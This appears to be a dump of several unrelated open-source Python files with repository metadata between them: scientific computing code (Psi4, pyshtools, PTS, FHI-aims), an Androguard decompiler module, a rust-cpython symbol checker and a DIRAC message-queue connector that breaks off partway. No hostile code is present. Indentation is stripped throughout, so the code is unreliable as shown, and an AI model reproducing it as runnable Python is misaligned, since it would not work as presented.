assert a._input['system'].output_map(vasp=a, structure=b) is None
a.system = 'system'
assert a.system == 'system'
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'system'
b.name = 'hello'
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'system: hello'
a.system = None
assert a.system is None
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'hello'
a.system = None
assert a.system is None
assert 'system' in a._input['system'].output_map(vasp=a, structure=b)
assert a._input['system'].output_map(vasp=a, structure=b)['system'] == 'hello'
|
pylada/pylada-light
|
tests/vasp/test_system.py
|
Python
|
gpl-3.0
| 2,246
|
[
"CRYSTAL",
"VASP"
] |
69d991cd24fdf9d9dc42a024c877578d225e50fdb370913341ebf1b6464a6875
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import numpy as np
import os
from psi4 import core
from psi4.driver import p4util
from psi4.driver.p4util.exceptions import *
# np.set_printoptions(precision=5, linewidth=200, threshold=2000, suppress=True)
def ah_iteration(mcscf_obj, tol=1e-3, max_iter=15, lindep=1e-14, print_micro=True):
"""
Solve the generalized eigenvalue problem:
| 0, g.T | | 1/l | = | 1/l |
| g, H/l | | X | = e | X |
Where g is the gradient, H is the orbital Hessian, X is our orbital update step,
and l is the eigenvalue.
In some ways this is the subspace reduction of the full MCSCF Hessian where the
CC part has been solved exactly. When this occurs the OC and CO elements collapse
to the above and the CC Hessian becomes diagonally dominant.
We can solve this through Davidson iterations where we condition the edges. It's the
Pulay equations all over again, just iterative.
Watch out for lambdas that are zero. Looking for the lambda that is ~1.
"""
# Unpack information
orb_grad = mcscf_obj.gradient()
precon = mcscf_obj.H_approx_diag()
approx_step = mcscf_obj.approx_solve()
orb_grad_ssq = orb_grad.sum_of_squares()
# Gears
min_lambda = 0.3
converged = False
warning_neg = False
warning_mult = False
fullG = np.zeros((max_iter + 2, max_iter + 2))
fullS = np.zeros((max_iter + 2, max_iter + 2))
fullS[np.diag_indices_from(fullS)] = 1
guesses = []
sigma_list = []
guesses.append(approx_step)
sigma_list.append(mcscf_obj.compute_Hk(approx_step))
if print_micro:
core.print_out("\n Eigenvalue Rel dE dX \n")
# Run Davidson look for lambda ~ 1
old_val = 0
for microi in range(1, max_iter + 1):
# Gradient
fullG[0, microi] = guesses[-1].vector_dot(orb_grad)
for i in range(microi):
fullG[i + 1, microi] = guesses[-1].vector_dot(sigma_list[i])
fullS[i + 1, microi] = guesses[-1].vector_dot(guesses[i])
fullG[microi] = fullG[:, microi]
fullS[microi] = fullS[:, microi]
wlast = old_val
# Slice out relevant S and G
S = fullS[:microi + 1, :microi + 1]
G = fullG[:microi + 1, :microi + 1]
# Solve Gv = lSv
v, L = np.linalg.eigh(S)
mask = v > (np.min(np.abs(v)) * 1.e-10)
invL = L[:, mask] * (v[mask] ** -0.5)
# Solve in S basis, rotate back
evals, evecs = np.linalg.eigh(np.dot(invL.T, G).dot(invL))
vectors = np.dot(invL, evecs)
# Figure out the right root to follow
if np.sum(np.abs(vectors[0]) > min_lambda) == 0:
raise PsiException("Augmented Hessian: Could not find the correct root!\n"\
"Try starting AH when the MCSCF wavefunction is more converged.")
if np.sum(np.abs(vectors[0]) > min_lambda) > 1 and not warning_mult:
core.print_out(" Warning! Multiple eigenvectors found to follow. Following closest to \lambda = 1.\n")
warning_mult = True
idx = (np.abs(1 - np.abs(vectors[0]))).argmin()
lam = abs(vectors[0, idx])
subspace_vec = vectors[1:, idx]
# Negative roots should go away?
if idx > 0 and evals[idx] < -5.0e-6 and not warning_neg:
core.print_out(' Warning! AH might follow negative eigenvalues!\n')
warning_neg = True
diff_val = evals[idx] - old_val
old_val = evals[idx]
new_guess = guesses[0].clone()
new_guess.zero()
for num, c in enumerate(subspace_vec / lam):
new_guess.axpy(c, guesses[num])
# Build estimated sigma vector
new_dx = sigma_list[0].clone()
new_dx.zero()
for num, c in enumerate(subspace_vec):
new_dx.axpy(c, sigma_list[num])
# Consider restraints
new_dx.axpy(lam, orb_grad)
new_dx.axpy(old_val * lam, new_guess)
norm_dx = (new_dx.sum_of_squares() / orb_grad_ssq) ** 0.5
if print_micro:
core.print_out(" AH microiter %2d % 18.12e % 6.4e % 6.4e\n" % (microi, evals[idx],
diff_val / evals[idx], norm_dx))
if abs(old_val - wlast) < tol and norm_dx < (tol ** 0.5):
converged = True
break
# Apply preconditioner
tmp = precon.clone()
val = tmp.clone()
val.set(evals[idx])
tmp.subtract(val)
new_dx.apply_denominator(tmp)
guesses.append(new_dx)
sigma_list.append(mcscf_obj.compute_Hk(new_dx))
if print_micro and converged:
core.print_out("\n")
# core.print_out(" AH converged! \n\n")
#if not converged:
# core.print_out(" !Warning. Augmented Hessian did not converge.\n")
new_guess.scale(-1.0)
return converged, microi, new_guess
|
rmcgibbo/psi4public
|
psi4/driver/procrouting/mcscf/augmented_hessian.py
|
Python
|
lgpl-3.0
| 5,838
|
[
"Psi4"
] |
673a2352347b008e9b990061992b7a3fb430d0ab8580128e414f536d43e7c4e1
|
#!/usr/bin/env python
"""
This script is a python version of TimingAccuracyGLQ. We use numpy functions to
simplify the creation of random coefficients.
"""
from __future__ import absolute_import, division, print_function
import os
import sys
import time
import numpy as np
sys.path.append(os.path.join(os.path.dirname(__file__), "../../.."))
from pyshtools import shtools
# ==== MAIN FUNCTION ====
def main():
TimingAccuracyGLQ()
# ==== TEST FUNCTIONS ====
def TimingAccuracyGLQ():
# ---- input parameters ----
maxdeg = 2800
ls = np.arange(maxdeg + 1)
beta = 1.5
print('Driscoll-Healy (real)')
# ---- create mask to filter out m<=l ----
mask = np.zeros((2, maxdeg + 1, maxdeg + 1), dtype=np.bool)
mask[0, 0, 0] = True
for l in ls:
mask[:, l, :l + 1] = True
mask[1, :, 0] = False
# ---- create Gaussian powerlaw coefficients ----
print('creating {:d} random coefficients'.format(2 * (maxdeg + 1) *
(maxdeg + 1)))
cilm = np.random.normal(loc=0., scale=1., size=(2, maxdeg + 1, maxdeg + 1))
cilm[:, 1:, :] *= np.sqrt((ls[1:]**beta) /
(2. * ls[1:] + 1.))[None, :, None]
old_power = shtools.SHPowerSpectrum(cilm)
new_power = 1. / (1. + ls)**beta # initialize degrees > 0 to power-law
cilm[:, :, :] *= np.sqrt(new_power / old_power)[None, :, None]
cilm[~mask] = 0.
# ---- time spherical harmonics transform for lmax set to increasing
# ---- powers of 2
lmax = 2
print('lmax maxerror rms tprecompute tinverse tforward')
while lmax <= maxdeg:
# trim coefficients to lmax
cilm_trim = cilm[:, :lmax + 1, :lmax + 1]
mask_trim = mask[:, :lmax + 1, :lmax + 1]
# precompute grid nodes and associated Legendre functions
tstart = time.time()
zeros, weights = shtools.SHGLQ(lmax)
tend = time.time()
tprecompute = tend - tstart
# synthesis / inverse
tstart = time.time()
grid = shtools.MakeGridGLQ(cilm_trim, zeros)
tend = time.time()
tinverse = tend - tstart
# analysis / forward
tstart = time.time()
cilm2_trim = shtools.SHExpandGLQ(grid, weights, zeros)
tend = time.time()
tforward = tend - tstart
# compute error
err = np.abs(cilm_trim[mask_trim] - cilm2_trim[mask_trim]) / \
np.abs(cilm_trim[mask_trim])
maxerr = err.max()
rmserr = np.mean(err**2)
print('{:4d} {:1.2e} {:1.2e} {:1.1e}s {:1.1e}s '
'{:1.1e}s'.format(lmax, maxerr, rmserr, tprecompute, tinverse,
tforward))
lmax = lmax * 2
# ==== EXECUTE SCRIPT ====
if __name__ == "__main__":
main()
|
heroxbd/SHTOOLS
|
examples/python/TimingAccuracy/TimingAccuracyGLQ.py
|
Python
|
bsd-3-clause
| 2,830
|
[
"Gaussian"
] |
681b244b9dde11a73e0a485010cbc0b92064790ec2c2487803ad6aeaf92f9e9a
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.catalogbuilder Contains the CatalogBuilder class.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ...core.basics.configurable import OldConfigurable
from ...core.tools import tables
# -----------------------------------------------------------------
class CatalogBuilder(OldConfigurable):
"""
This class ...
"""
def __init__(self, config=None):
"""
The constructor ...
:param config:
:return:
"""
# Call the constructor of the base class
super(CatalogBuilder, self).__init__(config, "magic")
# The image frame
self.frame = None
# References to the extractors
self.galaxy_extractor = None
self.star_extractor = None
self.trained_extractor = None
# The output catalogs
self.galactic_catalog = None
self.stellar_catalog = None
# -----------------------------------------------------------------
def run(self, frame, galaxy_extractor, star_extractor, trained_extractor):
"""
This function ...
:param frame:
:param galaxy_extractor:
:param star_extractor:
:param trained_extractor:
:return:
"""
# 1. Call the setup function
self.setup(frame, galaxy_extractor, star_extractor, trained_extractor)
# 2. Build the catalog
self.build()
# 3. Writing
self.write()
# -----------------------------------------------------------------
def clear(self):
"""
This function ...
:return:
"""
# Set attributes to None
self.frame = None
self.galaxy_extractor = None
self.star_extractor = None
self.trained_extractor = None
# -----------------------------------------------------------------
def setup(self, frame, galaxy_extractor, star_extractor, trained_extractor):
"""
This function ...
:param frame:
:param galaxy_extractor:
:param star_extractor:
:param trained_extractor:
:return:
"""
# Call the setup function of the base class
super(CatalogBuilder, self).setup()
# The frame
self.frame = frame
# References to the extractors
self.galaxy_extractor = galaxy_extractor
self.star_extractor = star_extractor
self.trained_extractor = trained_extractor
# -----------------------------------------------------------------
def build(self):
"""
This function ...
:return:
"""
# Build the galactic catalog
self.build_galactic_catalog()
# Build the stellar catalog
self.build_stellar_catalog()
# -----------------------------------------------------------------
def build_galactic_catalog(self):
"""
This function ...
:return:
"""
# Set galactic catalog (no merging with trained extractor (yet) and undetected galaxies are included anyway)
self.galactic_catalog = self.galaxy_extractor.catalog
# -----------------------------------------------------------------
def build_stellar_catalog(self):
"""
This function ...
:return:
"""
# Initialize columns
catalog_column = []
id_column = []
ra_column = []
dec_column = []
ra_error_column = []
dec_error_column = []
confidence_level_column = []
on_galaxy_column = []
original_id_column = []
# Append stars from the star extractor; loop over the stellar statistics
for i in range(len(self.star_extractor.statistics)):
# Get the index of this star in the input catalog used by the star extractor
index = self.star_extractor.statistics["Star index"][i]
# Skip undetected stars
if not self.star_extractor.statistics["Detected"][i]: continue
# Add the appropriate values in the columns
catalog_column.append(self.star_extractor.catalog["Catalog"][index] if not (hasattr(self.star_extractor.catalog["Catalog"], "mask") and self.star_extractor.catalog["Catalog"].mask[index]) else None)
id_column.append(self.star_extractor.catalog["Id"][index] if not (hasattr(self.star_extractor.catalog["Id"], "mask") and self.star_extractor.catalog["Id"].mask[index]) else None)
ra_column.append(self.star_extractor.catalog["Right ascension"][index])
dec_column.append(self.star_extractor.catalog["Declination"][index])
ra_error_column.append(self.star_extractor.catalog["Right ascension error"][index])
dec_error_column.append(self.star_extractor.catalog["Declination error"][index])
confidence_level_column.append(self.star_extractor.catalog["Confidence level"][index])
on_galaxy_column.append(self.star_extractor.catalog["On galaxy"][index])
original_id_column.append(None)
#position_error = 0.5 * self.frame.average_pixelscale.to("mas/pix").value # in mas !!
x_position_error = 0.5 * self.frame.pixelscale.x.to("mas/pix").value
y_position_error = 0.5 * self.frame.pixelscale.y.to("mas/pix").value
# Append stars from the trained extractor; loop over the stars found by the trained extractor
for star in self.trained_extractor.stars:
# Add the appropriate values in the columns
catalog_column.append(None)
id_column.append(None)
ra_column.append(star.position.ra.value)
dec_column.append(star.position.dec.value)
ra_error_column.append(x_position_error)
dec_error_column.append(y_position_error)
confidence_level_column.append(star.confidence_level)
on_galaxy_column.append(False)
original_id_column.append(None)
data = [catalog_column, id_column, ra_column, dec_column, ra_error_column, dec_error_column, confidence_level_column,
on_galaxy_column, original_id_column]
names = ['Catalog', 'Id', 'Right ascension', 'Declination', 'Right ascension error', 'Declination error', 'Confidence level',
'On galaxy', 'Original catalog and id']
# Create the merged stellar catalog
self.stellar_catalog = tables.new(data, names)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Write the galactic catalog
self.write_galactic_catalog()
# Write the stellar catalog
self.write_stellar_catalog()
# -----------------------------------------------------------------
def write_galactic_catalog(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
def write_stellar_catalog(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
|
Stargrazer82301/CAAPR
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/builder.py
|
Python
|
mit
| 7,693
|
[
"Galaxy"
] |
17c2a23204e27876d6cc1aa42c0b6e4753e694874fbc34cadcf0ea665b0f5a75
|
# This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
# All Rights Reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import logging
from androguard.decompiler.dad.opcode_ins import INSTRUCTION_SET
from androguard.decompiler.dad.instruction import Variable
from androguard.decompiler.dad.node import Node
logger = logging.getLogger('dad.basic_blocks')
class BasicBlock(Node):
def __init__(self, name, block_ins):
super(BasicBlock, self).__init__(name)
self.ins = block_ins
self.ins_range = None
self.loc_ins = None
def get_ins(self):
return self.ins
def get_loc_with_ins(self):
if self.loc_ins is None:
self.loc_ins = zip(range(*self.ins_range), self.ins)
return self.loc_ins
def remove_ins(self, loc, ins):
self.ins.remove(ins)
self.loc_ins.remove((loc, ins))
def add_ins(self, new_ins_list):
for new_ins in new_ins_list:
self.ins.append(new_ins)
self.ins_range[1] += len(new_ins_list)
def number_ins(self, num):
last_ins_num = num + len(self.ins)
self.ins_range = [num, last_ins_num]
self.loc_ins = None
return last_ins_num
class StatementBlock(BasicBlock):
def __init__(self, name, block_ins):
super(StatementBlock, self).__init__(name, block_ins)
def visit(self, visitor):
return visitor.visit_statement_node(self)
def __str__(self):
return '%d-Statement(%s)' % (self.num, self.name)
class ReturnBlock(BasicBlock):
def __init__(self, name, block_ins):
super(ReturnBlock, self).__init__(name, block_ins)
def visit(self, visitor):
return visitor.visit_return_node(self)
def __str__(self):
return '%d-Return(%s)' % (self.num, self.name)
class ThrowBlock(BasicBlock):
def __init__(self, name, block_ins):
super(ThrowBlock, self).__init__(name, block_ins)
def visit(self, visitor):
return visitor.visit_throw_node(self)
def __str__(self):
return '%d-Throw(%s)' % (self.num, self.name)
class SwitchBlock(BasicBlock):
def __init__(self, name, switch, block_ins):
super(SwitchBlock, self).__init__(name, block_ins)
self.switch = switch
self.cases = []
self.default = None
self.node_to_case = {}
def add_case(self, case):
self.cases.append(case)
def visit(self, visitor):
return visitor.visit_switch_node(self)
def copy_from(self, node):
super(SwitchBlock, self).copy_from(node)
self.cases = node.cases
self.switch = node.switch
def update_attribute_with(self, n_map):
super(SwitchBlock, self).update_attribute_with(n_map)
self.cases = [n_map.get(n, n) for n in self.cases]
for node1, node2 in n_map.iteritems():
if node1 in self.node_to_case:
self.node_to_case[node2] = self.node_to_case.pop(node1)
def order_cases(self):
values = self.switch.get_values()
if len(values) < len(self.cases):
self.default = self.cases.pop(0)
for case, node in zip(values, self.cases):
self.node_to_case.setdefault(node, []).append(case)
def __str__(self):
return '%d-Switch(%s)' % (self.num, self.name)
class CondBlock(BasicBlock):
def __init__(self, name, block_ins):
super(CondBlock, self).__init__(name, block_ins)
self.true = None
self.false = None
def set_true(self, node):
self.true = node
def set_false(self, node):
self.false = node
def update_attribute_with(self, n_map):
super(CondBlock, self).update_attribute_with(n_map)
self.true = n_map.get(self.true, self.true)
self.false = n_map.get(self.false, self.false)
def neg(self):
if len(self.ins) > 1:
raise ('Condition should have only 1 instruction !')
self.ins[0].neg()
def visit(self, visitor):
return visitor.visit_cond_node(self)
def visit_cond(self, visitor):
if len(self.ins) > 1:
raise ('Condition should have only 1 instruction !')
return visitor.visit_ins(self.ins[0])
def __str__(self):
return '%d-If(%s)' % (self.num, self.name)
class Condition(object):
def __init__(self, cond1, cond2, isand, isnot):
self.cond1 = cond1
self.cond2 = cond2
self.isand = isand
self.isnot = isnot
def neg(self):
self.isand = not self.isand
self.cond1.neg()
self.cond2.neg()
def get_ins(self):
lins = []
lins.extend(self.cond1.get_ins())
lins.extend(self.cond2.get_ins())
return lins
def get_loc_with_ins(self):
loc_ins = []
loc_ins.extend(self.cond1.get_loc_with_ins())
loc_ins.extend(self.cond2.get_loc_with_ins())
return loc_ins
def visit(self, visitor):
return visitor.visit_short_circuit_condition(self.isnot, self.isand,
self.cond1, self.cond2)
def __str__(self):
if self.isnot:
ret = '!%s %s %s'
else:
ret = '%s %s %s'
return ret % (self.cond1, ['||', '&&'][self.isand], self.cond2)
class ShortCircuitBlock(CondBlock):
def __init__(self, name, cond):
super(ShortCircuitBlock, self).__init__(name, None)
self.cond = cond
def get_ins(self):
return self.cond.get_ins()
def get_loc_with_ins(self):
return self.cond.get_loc_with_ins()
def neg(self):
self.cond.neg()
def visit_cond(self, visitor):
return self.cond.visit(visitor)
def __str__(self):
return '%d-SC(%s)' % (self.num, self.cond)
class LoopBlock(CondBlock):
def __init__(self, name, cond):
super(LoopBlock, self).__init__(name, None)
self.cond = cond
def get_ins(self):
return self.cond.get_ins()
def neg(self):
self.cond.neg()
def get_loc_with_ins(self):
return self.cond.get_loc_with_ins()
def visit(self, visitor):
return visitor.visit_loop_node(self)
def visit_cond(self, visitor):
return self.cond.visit_cond(visitor)
def update_attribute_with(self, n_map):
super(LoopBlock, self).update_attribute_with(n_map)
self.cond.update_attribute_with(n_map)
def __str__(self):
if self.looptype.pretest():
if self.false in self.loop_nodes:
return '%d-While(!%s)[%s]' % (self.num, self.name, self.cond)
return '%d-While(%s)[%s]' % (self.num, self.name, self.cond)
elif self.looptype.posttest():
return '%d-DoWhile(%s)[%s]' % (self.num, self.name, self.cond)
elif self.looptype.endless():
return '%d-WhileTrue(%s)[%s]' % (self.num, self.name, self.cond)
return '%dWhileNoType(%s)' % (self.num, self.name)
class TryBlock(BasicBlock):
def __init__(self, name, block_ins):
super(TryBlock, self).__init__(name, block_ins)
self.catch = []
def add_catch(self, node):
self.catch.append(node)
def __str__(self):
return 'Try(%s)' % self.name
class CatchBlock(BasicBlock):
def __init__(self, name, block_ins, typeh):
super(CatchBlock, self).__init__(name, block_ins)
self.exception_type = typeh
def __str__(self):
return 'Catch(%s)' % self.name
class GenInvokeRetName(object):
def __init__(self):
self.num = 0
self.ret = None
def new(self):
self.num += 1
self.ret = Variable('tmp%d' % self.num)
return self.ret
def set_to(self, ret):
self.ret = ret
def last(self):
return self.ret
def build_node_from_block(block, vmap, gen_ret):
ins, lins = None, []
idx = block.get_start()
for ins in block.get_instructions():
opcode = ins.get_op_value()
if opcode == 0x1f: # check-cast
idx += ins.get_length()
continue
_ins = INSTRUCTION_SET.get(ins.get_name().lower())
if _ins is None:
logger.error('Unknown instruction : %s.', _ins.get_name().lower())
# fill-array-data
if opcode == 0x26:
fillaray = block.get_special_ins(idx)
lins.append(_ins(ins, vmap, fillaray))
# invoke-kind[/range]
elif (0x6e <= opcode <= 0x72 or 0x74 <= opcode <= 0x78):
lins.append(_ins(ins, vmap, gen_ret))
# filled-new-array[/range]
elif 0x24 <= opcode <= 0x25:
lins.append(_ins(ins, vmap, gen_ret.new()))
# move-result*
elif 0xa <= opcode <= 0xc:
lins.append(_ins(ins, vmap, gen_ret.last()))
# monitor-{enter,exit}
elif 0x1d <= opcode <= 0x1e:
idx += ins.get_length()
continue
else:
lins.append(_ins(ins, vmap))
idx += ins.get_length()
name = block.get_name()
# return*
if 0xe <= opcode <= 0x11:
node = ReturnBlock(name, lins)
node.set_return()
# {packed,sparse}-switch
elif 0x2b <= opcode <= 0x2c:
idx -= ins.get_length()
values = block.get_special_ins(idx)
node = SwitchBlock(name, values, lins)
node.set_switch()
# if-test[z]
elif 0x32 <= opcode <= 0x3d:
node = CondBlock(name, lins)
node.set_cond()
node.off_last_ins = ins.get_ref_off()
# throw
elif opcode == 0x27:
node = ThrowBlock(name, lins)
node.set_throw()
else:
# goto*
if 0x28 <= opcode <= 0x2a:
lins.pop()
node = StatementBlock(name, lins)
node.set_stmt()
return node
|
JulianSchuette/android-instrumentation
|
injector/androguard/decompiler/dad/basic_blocks.py
|
Python
|
apache-2.0
| 10,398
|
[
"VisIt"
] |
d5ddc309a585951d768aed2cd0a8ba13d98b9897f5ef24cbf65f6891fd806f33
|
from django.template import Template
from django.template import Context
from django.conf import settings
import os
import json
import itertools
from collections import namedtuple
import time
import math
from functools import partial
settings.configure() #ignoring django bullshit
variables = json.load(open("variables.json"))
template = Template(open("control.template").read())
class Variable:
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
return self.name + "=" + str(self.value)
combinations = []
for var in variables["iterables"]:
values = []
for value in var["values"]:
values.append(Variable(var["name"], value))
combinations.append(values)
def nextOddInteger(num):
ceil = math.ceil(num)
return ceil if ceil % 2 == 1 else ceil +1
def atomLine(arr):
return "atom\t" + "\t".join(map(str, arr[0:3])) + " " + arr[3]
def cordByPos(pos, atoms):
return atoms[pos]
def average(atoms, cordNum):
return mean(map(partial(cordByPos, cordNum), atoms))
def origin(atoms):
return map(partial(average, atoms), [0, 1, 2])
def mean(arr):
l = len(arr)
return float(sum(arr)) / l if l > 0 else float('nan')
def subtract(pair):
return pair[0] - pair[1]
def square(x):
return x * x
def distance(originCords, atomCords):
diffs = map(subtract, zip(atomCords, originCords))
return math.sqrt(sum(map(square, diffs)))
def maxDistance(origin, atoms):
return max(map(partial(distance, origin), atoms))
def constant(name):
return next(const["value"] for const in variables["constants"] if const["name"] == name)
def cubeOutput(num):
return "output cube eigenstate {0}\ncube filename eigen{0}.cube".format(num)
def cubeOutputs(num):
return "\n".join(map(cubeOutput, range(1, num + 1)))
atoms = variables["atoms"]
originCords = map(lambda x: round(x, 3), origin(atoms))
cube_origin = " ".join(map(str, originCords))
voxel_size = constant("voxel_size")
cube_edge = nextOddInteger(maxDistance(originCords, atoms) * 2 / voxel_size)
cube_outputs = cubeOutputs(constant("eigen_cubes_number"))
geometry = "\n".join(map(atomLine, atoms))
for comb in itertools.product(*combinations):
directory = "-".join(map(str, comb))
if not os.path.exists(directory):
os.makedirs(directory)
# create a context for a template
dic = dict([(str(x.name), x.value) for x in comb])
for constant in variables["constants"]:
dic[constant["name"]] = constant["value"]
dic["cube_origin"] = cube_origin
dic["cube_edge"] = cube_edge
dic["cube_outputs"] = cube_outputs
context = Context(dic)
# render a template in a control file
open(directory + "/control.in", "w").write(template.render(context))
# output a generated geometry into a geometry file
open(directory + "/geometry.in", "w").write(geometry)
os.chdir(directory)
start = time.time()
print "Executing FHI-AIMS on " + directory + "..."
os.system("/home/john/Desktop/FHI-AIMS/aims_110113/bin/aims.110113.mpi.x > output.out")
print "Executed FHI-AIMS on " + directory + " in " + str(time.time() - start) + " secs"
os.chdir("..")
|
Tulane/FHI-AIMS-input-generator
|
generator.py
|
Python
|
mit
| 3,071
|
[
"FHI-aims"
] |
1f05ef482ef5a7f4a3fc7524a36eefbbe4a72c5c288d3d82610e198487f141e3
|
#!/usr/bin/env python
import sysconfig
import subprocess
import json
import os
import sys
import platform
if os.path.dirname(__file__):
os.chdir(os.path.dirname(__file__))
if platform.system() == 'Windows' or platform.system().startswith('CYGWIN'):
sys.exit(0) # test not supported on windows - ignore it
so_files = [
sysconfig.get_config_var("LIBDIR")+"/"+sysconfig.get_config_var("LDLIBRARY"),
sysconfig.get_config_var("LIBPL")+"/"+sysconfig.get_config_var("LDLIBRARY")
]
so_file = None
for name in so_files:
if os.path.isfile(name):
so_file = name
if not so_file:
print('Could not find %r' % so_files)
sys.exit(1)
so_symbols = set()
for line in subprocess.check_output(['readelf', '-Ws', so_file]).splitlines():
if line:
so_symbols.add(line.decode('utf-8').split()[-1])
assert 'PyList_Type' in so_symbols
assert 'PyList_New' in so_symbols
cfgs = []
if sys.version_info.major == 3:
sys_lib = 'python3-sys'
for i in range(4, sys.version_info.minor+1):
cfgs += ['--cfg', 'Py_3_{}'.format(i)]
else:
sys_lib = 'python27-sys'
interesting_config_flags = [
"Py_USING_UNICODE",
"Py_UNICODE_WIDE",
"WITH_THREAD",
"Py_DEBUG",
"Py_REF_DEBUG",
"Py_TRACE_REFS",
"COUNT_ALLOCS"
]
for name in interesting_config_flags:
if sysconfig.get_config_var(name):
cfgs += ['--cfg', 'py_sys_config="{}"'.format(name)]
interesting_config_values = ['Py_UNICODE_SIZE']
for name in interesting_config_values:
cfgs += ['--cfg', 'py_sys_config="{}_{}"'.format(name, sysconfig.get_config_var(name))]
json_output = subprocess.check_output(['rustc', '-Z', 'ast-json', '../{}/src/lib.rs'.format(sys_lib)] + cfgs)
doc = json.loads(json_output.decode('utf-8'))
foreign_symbols = set()
def visit(node, foreign):
if isinstance(node, dict):
node_node = node.get('node', None)
if isinstance(node_node, dict) and node_node.get('variant') in ('Static', 'Fn') and foreign:
foreign_symbols.add(node['ident'])
if isinstance(node_node, dict) and node_node.get('variant') == 'ForeignMod':
foreign = True
for v in node.values():
visit(v, foreign)
elif isinstance(node, list):
for v in node:
visit(v, foreign)
elif isinstance(node, (int, type(u''), bool, type(None))):
pass
else:
raise Exception('Unsupported node type {}'.format(type(node)))
visit(doc, foreign=False)
assert 'PyList_Type' in foreign_symbols, "Failed getting statics from rustc -Z ast-json"
assert 'PyList_New' in foreign_symbols, "Failed getting functions from rustc -Z ast-json"
names = sorted(foreign_symbols - so_symbols)
if names:
print('Symbols missing in {}:'.format(so_file))
print('\n'.join(names))
sys.exit(1)
else:
print('Symbols in {} OK.'.format(so_file))
|
naufraghi/rust-cpython
|
tests/check_symbols.py
|
Python
|
mit
| 2,847
|
[
"VisIt"
] |
140608331a017f4e8e06e1469b5e4650e1e688b674273a49d5a9c122d9603858
|
"""
Class for management of Stomp MQ connections, e.g. RabbitMQ
"""
import json
import random
import os
import socket
import ssl
import time
import stomp
from DIRAC.Resources.MessageQueue.MQConnector import MQConnector
from DIRAC.Core.Security import Locations
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.DErrno import EMQUKN, EMQCONN
class StompMQConnector(MQConnector):
"""
Class for management of message queue connections
Allows to both send and receive messages from a queue
"""
# Setting for the reconnection handling by stomp interface.
# See e.g. the description of Transport class in
# https://github.com/jasonrbriggs/stomp.py/blob/master/stomp/transport.py
RECONNECT_SLEEP_INITIAL = 1 # [s] Initial delay before reattempting to establish a connection.
RECONNECT_SLEEP_INCREASE = 0.5 # Factor by which sleep delay is increased 0.5 means increase by 50%.
RECONNECT_SLEEP_MAX = 120 # [s] The maximum delay that can be reached independent of increasing procedure.
RECONNECT_SLEEP_JITTER = 0.1 # Random factor to add. 0.1 means a random number from 0 to 10% of the current time.
RECONNECT_ATTEMPTS_MAX = 1e4 # Maximum attempts to reconnect.
PORT = 61613
def __init__(self, parameters=None):
""" Standard constructor
"""
super(StompMQConnector, self).__init__()
self.log = gLogger.getSubLogger(self.__class__.__name__)
self.connections = {}
if 'DIRAC_DEBUG_STOMP' in os.environ:
gLogger.enableLogsFromExternalLibs()
def setupConnection(self, parameters=None):
"""
Establishes a new connection to a Stomp server, e.g. RabbitMQ
Args:
parameters(dict): dictionary with additional MQ parameters if any.
Returns:
S_OK/S_ERROR
"""
if parameters is not None:
self.parameters.update(parameters)
# Check that the minimum set of parameters is present
if not all(p in parameters for p in ('Host', 'VHost')):
return S_ERROR('Input parameters are missing!')
reconnectSleepInitial = self.parameters.get('ReconnectSleepInitial', StompMQConnector.RECONNECT_SLEEP_INITIAL)
reconnectSleepIncrease = self.parameters.get('ReconnectSleepIncrease', StompMQConnector.RECONNECT_SLEEP_INCREASE)
reconnectSleepMax = self.parameters.get('ReconnectSleepMax', StompMQConnector.RECONNECT_SLEEP_MAX)
reconnectSleepJitter = self.parameters.get('ReconnectSleepJitter', StompMQConnector.RECONNECT_SLEEP_JITTER)
reconnectAttemptsMax = self.parameters.get('ReconnectAttemptsMax', StompMQConnector.RECONNECT_ATTEMPTS_MAX)
host = self.parameters.get('Host')
port = self.parameters.get('Port', StompMQConnector.PORT)
vhost = self.parameters.get('VHost')
sslVersion = self.parameters.get('SSLVersion')
hostcert = self.parameters.get('HostCertificate')
hostkey = self.parameters.get('HostKey')
connectionArgs = {'vhost': vhost,
'keepalive': True,
'reconnect_sleep_initial': reconnectSleepInitial,
'reconnect_sleep_increase': reconnectSleepIncrease,
'reconnect_sleep_max': reconnectSleepMax,
'reconnect_sleep_jitter': reconnectSleepJitter,
'reconnect_attempts_max': reconnectAttemptsMax}
